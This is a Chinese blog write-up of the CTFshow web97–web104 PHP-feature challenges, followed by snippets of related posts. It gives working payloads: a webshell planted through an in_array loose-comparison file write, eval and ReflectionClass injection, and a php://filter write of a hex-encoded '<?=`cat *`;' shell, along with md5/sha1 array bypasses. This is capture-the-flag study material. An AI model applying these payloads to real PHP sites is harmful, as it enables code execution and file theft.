CTFshow之web97~web104---php特性(2)

最新推荐文章于 2024-07-14 15:36:54 发布
最新推荐文章于 2024-07-14 15:36:54 发布
阅读量1k 收藏 4
点赞数 2
文章标签: php CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l2872253606/article/details/125173781
版权

目录

web97

web98

web99

 web100

web101

web102

web103

web104

web97

要传入的a跟b不相同,但是对应的md5加密要相同,这。。。但是MD5这个函数呢有个漏洞,传入的参数为数组的时候会发生错误,并返回NULL,我们可以利用这个漏洞,POST传参

a[]=1&b[]=5

web98

?是基本上所有语言通用的三元运算符

按照上面三元运算符的逻辑来看,不能直接GET传入

HTTP_FLAG=flag

因为第一个三元运算符成立就会让$_GET=&$_POST,会导致原本get传参的内容失效而等于POST传参的内容,所以我们可以随便GET传一个参数,再POST传参

HTTP_FLAG=flag

即可highlight_file($flag),因为$flag不是php文件,所以会导致报错而回显$flag的值

web99

先看一下陌生函数

array(),是空数组定义,题中定义了$allow为空数组

0x36d,其十进制为877

rand(),返回随机整数

array_push(),是向数组尾部插入新的值

file_put_contents(),写文件

因为in_array第三个参数没设置为true,所以该函数是宽松比较(==),字符串型会先转化为整型再比较,只要值相同就可以了,所以我们可以传参写木马进去,因为都是从1开始随机取整,我们可以直接让n=1.php这样猜中的概率大一些,不中就选其他吧

 然后上蚁剑连接,就能拿到flag了

 web100

 这里呢=的优先级是比and跟or高的,所以v0直接就赋值v1了,可以构造一个

eval(var_dump(get_class_vars('ctfshow')););

即构造payload

?v1=1&v3=);&v2=var_dump(get_class_vars

0x2d的ascii码是-,替换裹上ctfshow{}就是flag了 

web101

过滤了好多符号,但是空格没过滤掉,可以用Reflectionclass反射函数包涵类信息,直接构造payload

?v1=1&v2=echo new Reflectionclass&v3=;

根据提示,flag得将0x2d替换成-,后面一位还得爆破,爆出是2

ctfshow{76d3705a-00c7-45ec-891d-cea90f6fc5c2}

web102

 这里的call_user_func是调用函数的意思

fun("参数"),相当于call_user_func(fun,"参数")

传参v2必须是纯数字字符串,而且v2还得是写入文件的内容,v3可以用伪协议转码写入

php://filter/write=convert.base64-decode/resource=1.php

上面的意思是base64解码后写入1.php文件,纯数字可以用ascii码转十六进制绕过,v1可以设置个十六进制转ascii码函数hex2bin(),经过尝试发现了能用的命令

<?=`cat *`;       //打开当前目录的所有文件

转为base64为

PD89YGNhdCAqYDs

再转化为ascii的十六进制

5044383959474e6864434171594473

因为函数会去掉前面两位字符串,所以构造payload,get传参

v2=225044383959474e6864434171594473&v3=php://filter/write=convert.base64-
decode/resource=1.php

post传参

v1=hex2bin

然后访问1.php再查看页面源码,即可发现flag

web103

正则把含有p,h,p的字符串都过掉了,不过不影响我们构造payload,解法跟上题一样,GET传参

?v2=005044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

POST传参

v1=hex2bin

 访问1.php并查看源码即可拿到flag

web104

shal函数就是计算散列函数,可以理解为一个不可逆的加密函数,这题没啥过滤,直接传两个相同的参数就好了,构造payload

GET传参:
v2=123
POST传参:
v1=123
金 帛
关注
  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
ctfshow web入门 PHP特性前篇(web89-web104)
ccfly1012的博客
09-08 1268
目录 web89 web90 web91 web92 web93 web94 web95 web90,92-95总结 web96 web97 拓展 web98 web99 web100 web101 web102 web103 web104 web89 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by:
ctfshow之web52~web54
最新发布
qq_74350234的博客
08-30 595
09${IFS}$IFS${cat,fl*}%20tac more less head tail nl od(二进制查看) vi vim sort uniq rev cp mvcp命令尝试:?php${IFS}a.txt||//(//后面的内容可以不写的,因为类似会被注释掉)答案也是不在这里,:这里通配符用不了,但可以用双单引号绕过flag:这里也可以不写目录结构,默认copy到/var/www/html/下)或者:?.php
ctfshow-web97(php特性)
m0_62094846的博客
01-13 321
要用到md5无法处理数组 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 19:36:32 # @link: https://ctfer.com */ include("flag.php"); highlight_file(__FILE__); if (is.
ctfshow-web入门-php特性web96-web99)
Welcome To Myon'Blog !
07-13 1121
如果 $_GET 不为空,也就是说我们进行了 get 传参,那么就会通过 $_GET = &$_POST 将 $_POST 的引用赋值给 $_GET,引用赋值导致两个变量指向同一个内存地址,而 $_POST 变量内容改变会影响 $_GET 变量的内容;$_GET 变量是一个数组,预定义的 $_GET 变量用于收集来自 method="get" 的表单中的值,表单域的名称会自动成为 $_GET 数组中的键。isset()函数用于检查变量是否设置,如果设置了,则 id=$_GET['id'],否则 id=1。
CTFshow php特性 web97
Kradress的博客
12-13 437
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 19:36:32 # @link: https://ctfer.com */ include("flag.php"); highlight_file(__FILE__); if (iss
ctfshow web97-100 php特性
qq_52671379的博客
03-28 555
ctfshow web97-php特性
ctfshow-web104(php特性)
m0_62094846的博客
01-14 157
sha1() 函数计算字符串的 SHA-1 散列。 <?php /* # -*- coding: utf-8 -*- # @Author: atao # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-28 22:27:20 */ highlight_file(__FILE__); include("flag.php"); if(isset($_POST['
ctfshow-web41~60-WP
02-21
### CTFShow Web挑战41~60:深入解析与实战技巧 #### 挑战概述 CTFShow是一个提供多样化的网络安全挑战题目的平台,其中包含了大量的Web安全题目供参与者学习与实践。本篇文章主要关注的是CTFShow中的Web挑战第41...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【标题】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 指的是一项网络安全竞赛中的Web题目,该题目重点在于理解PHP编程语言中的变量循环取值机制。在CTF(Capture The Flag)比赛中,参赛者通常需要解决各种...
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
ctfshow-Web入门-58~74wp
yutianovo的博客
09-24 1121
Web58-65 POST c=include($_GET['url']); GET /?url=php://filter/read=convert.base64-encode/resource=flag.php Web66-70 flag 换位置了 /flag.txt Payload还可以用 Web71 import requests url = "http://c5e8824e-b5b4-4842-8d39-bbcb78eb7976.chall.ctf.show/" d = {'c': 'i
CtfShow web入门-php特性[89-97]
qq_54803507的博客
02-21 455
CtfShow web入门-php特性[89-97]
CTFshow web入门web97-php9
weixin_74336671的博客
11-22 83
使用数组绕过(用POST传参的形式):a[]=1&[]=0。1.输入的两个值不能相等。2.md5加密后需要相等。
CTFshow php特性 web104
Kradress的博客
12-14 200
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: atao # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-28 22:27:20 */ highlight_file(__FILE__); include("flag.php"); if(isset($_POST['v1']) &&amp
ctfshow web95-104
weixin_58519918的博客
04-30 576
web(95) 直接使用上一题的即可。【\. 表示. 因为.有代表的含义了所以使用转义符来转义下。】 web(96)【路径问题】 文件读取我们可以使用php伪协议来直接读取。或者使用./flag.php的形式来进行读取。 ?u=/var/www/html/flag.php 绝对路径 ?u=./flag.php 相对路径 web97)【md5函数;isset函数】 isset()函数用于检测变量是否已设置并...
CTFshow web(php特性97-100)
csjjjd的博客
02-03 1378
0x36d(877)这里是从36循环到877,每次i都加一,也就是说我从1~36直接生成一个随机数,然后1~37之间生成一个随机数,1~38............直到1~876,有没有发现一个事实,我每次的范围都包含了一个数字的,那就是1。接下来因为我把1传进去了,访问1.php页面,然后直接1=system("ls");所以越是前面的数据越是容易出现数据,出现覆盖对吧。有意思的是,这里的数组会对元素进行一个覆盖,这个位置产生了数据,但是第二次随机数又在。把格式包裹,然后0x2d换成-就好了。
ctfshow web入门 php特性 web93-97
m0_62207170的博客
06-21 1008
ctfshow web入门 php特性 web93-97
ctfshow-web入门-php特性web104-web108)
Welcome To Myon'Blog !
07-14 849
需要传入的 v1 和 v2 进行 sha1 加密后相等。解法1:这里都没有判断 v1 和 v2 是否相等,我们直接传入同样的内容加密后肯定也一样。?v2=1post:v1=1拿到 flag:ctfshow{bd4eea6b-872d-462c-b8f2-20f48d3ee652}解法2:对于 php 强比较和弱比较:md5(),sha1() 函数无法处理数组,如果传入的为数组,会返回 NULL ,两个数组经过加密后得到的都是 NULL ,也就是相等的。?
ctfshow web入门99
m0_73303597的博客
01-11 606
自用
ctfshow web入门 php特性
03-16
PHP是一种开源的服务器端脚本语言,主要用于网站开发。它支持多种数据库和操作系统,并且可以与HTML、CSS和JavaScript等语言结合使用。常用的特性包括变量、数组、循环、条件语句、函数、类和对象等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金 帛

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值